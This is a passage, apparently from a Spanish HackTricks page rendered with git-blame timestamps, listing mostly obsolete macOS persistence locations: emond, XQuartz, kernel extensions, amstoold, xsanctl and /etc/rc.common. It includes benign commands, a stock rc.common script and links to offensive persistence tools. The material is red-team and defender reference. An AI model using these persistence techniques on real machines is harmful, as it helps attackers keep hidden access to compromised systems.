No puedo encontrar este componente en mi macOS, para obtener más información consulta el informe técnico.
2023-09-28 20:19:13 +00:00
{% endhint %}
2024-02-07 05:32:25 +00:00
Informe técnico: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Introducido por Apple, **emond** es un mecanismo de registro que parece estar subdesarrollado o posiblemente abandonado, pero sigue siendo accesible. Aunque no es particularmente beneficioso para un administrador de Mac, este servicio oscuro podría servir como un método sutil de persistencia para actores de amenazas, probablemente pasando desapercibido para la mayoría de los administradores de macOS.
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Para aquellos que conocen su existencia, identificar cualquier uso malicioso de **emond** es sencillo. El LaunchDaemon del sistema para este servicio busca scripts para ejecutar en un directorio único. Para inspeccionar esto, se puede utilizar el siguiente comando:
2023-09-28 20:19:13 +00:00
```bash
ls -l /private/var/db/emondClients
```
2024-02-13 00:50:14 +00:00
### ~~XQuartz~~
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
2023-09-28 20:19:13 +00:00
#### Ubicación
* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
2024-02-07 05:32:25 +00:00
* Se requiere acceso de root
* **Desencadenante**: Con XQuartz
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
XQuartz **ya no está instalado en macOS** , así que si deseas más información, consulta el writeup.
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
### ~~kext~~
2023-09-28 20:19:13 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Es tan complicado instalar kext incluso como root que no lo consideraré para escapar de las cajas de arena o para persistencia (a menos que tengas un exploit)
2023-09-28 20:19:13 +00:00
{% endhint %}
#### Ubicación
2024-02-07 05:32:25 +00:00
Para instalar un KEXT como un elemento de inicio, debe estar **instalado en una de las siguientes ubicaciones** :
2023-09-28 20:19:13 +00:00
* `/System/Library/Extensions`
* Archivos KEXT integrados en el sistema operativo OS X.
* `/Library/Extensions`
* Archivos KEXT instalados por software de terceros
2024-02-13 00:50:14 +00:00
Puedes listar los archivos KEXT cargados actualmente con:
2023-09-28 20:19:13 +00:00
```bash
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
2024-02-07 05:32:25 +00:00
Para obtener más información sobre [**extensiones de kernel, consulte esta sección** ](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers ).
2023-09-28 20:19:13 +00:00
### ~~amstoold~~
2024-02-13 00:50:14 +00:00
Descripción y explotación
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Aparentemente, el `plist` de `/System/Library/LaunchAgents/com.apple.amstoold.plist` estaba utilizando este binario mientras exponía un servicio XPC... el problema es que el binario no existía, por lo que podías colocar algo allí y cuando se llamara al servicio XPC, se llamaría a tu binario.
2023-09-28 20:19:13 +00:00
Ya no puedo encontrar esto en mi macOS.
### ~~xsanctl~~
2024-02-13 00:50:14 +00:00
Descripción y explotación
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Aparentemente, no es muy común ejecutar este script y ni siquiera pude encontrarlo en mi macOS, así que si deseas más información, consulta el informe.
2023-09-28 20:19:13 +00:00
### ~~/etc/rc.common~~
2023-06-05 18:30:03 +00:00
{% hint style="danger" %}
2023-09-26 23:44:22 +00:00
**Esto no funciona en las versiones modernas de MacOS**
2023-06-05 18:30:03 +00:00
{% endhint %}
2024-02-07 05:32:25 +00:00
También es posible colocar aquí **comandos que se ejecutarán al inicio.** Ejemplo de un script rc.common regular:
2023-06-05 18:30:03 +00:00
```bash
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#
######################
# Configure the shell #
######################
#
# Be strict
#
#set -e
set -u
#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
###################
# Useful functions #
###################
#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
2023-09-26 23:44:22 +00:00
local test
if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
2023-06-05 18:30:03 +00:00
}
alias ConsoleMessage=echo
#
# Process management
#
GetPID ()
{
2023-09-26 23:44:22 +00:00
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local pid=""
if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi
if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
2023-06-05 18:30:03 +00:00
}
#
# Generic action handler
#
RunService ()
{
2023-09-26 23:44:22 +00:00
case $1 in
start ) StartService ;;
stop ) StopService ;;
restart) RestartService ;;
* ) echo "$0: unknown argument: $1";;
esac
2023-06-05 18:30:03 +00:00
}
```
2023-09-28 20:19:13 +00:00
## Técnicas y herramientas de persistencia
2023-06-05 18:30:03 +00:00
* [https://github.com/cedowens/Persistent-Swift ](https://github.com/cedowens/Persistent-Swift )
* [https://github.com/D00MFist/PersistentJXA ](https://github.com/D00MFist/PersistentJXA )
< details >
2024-02-08 22:25:00 +00:00
< summary > < strong > Aprende hacking en AWS de cero a héroe con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-30 23:59:08 +00:00
Otras formas de apoyar a HackTricks:
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
* Obtén el [**oficial PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Descubre [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), nuestra colección exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-13 00:50:14 +00:00
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **síguenos** en **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-07 05:32:25 +00:00
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2023-06-05 18:30:03 +00:00
< / details >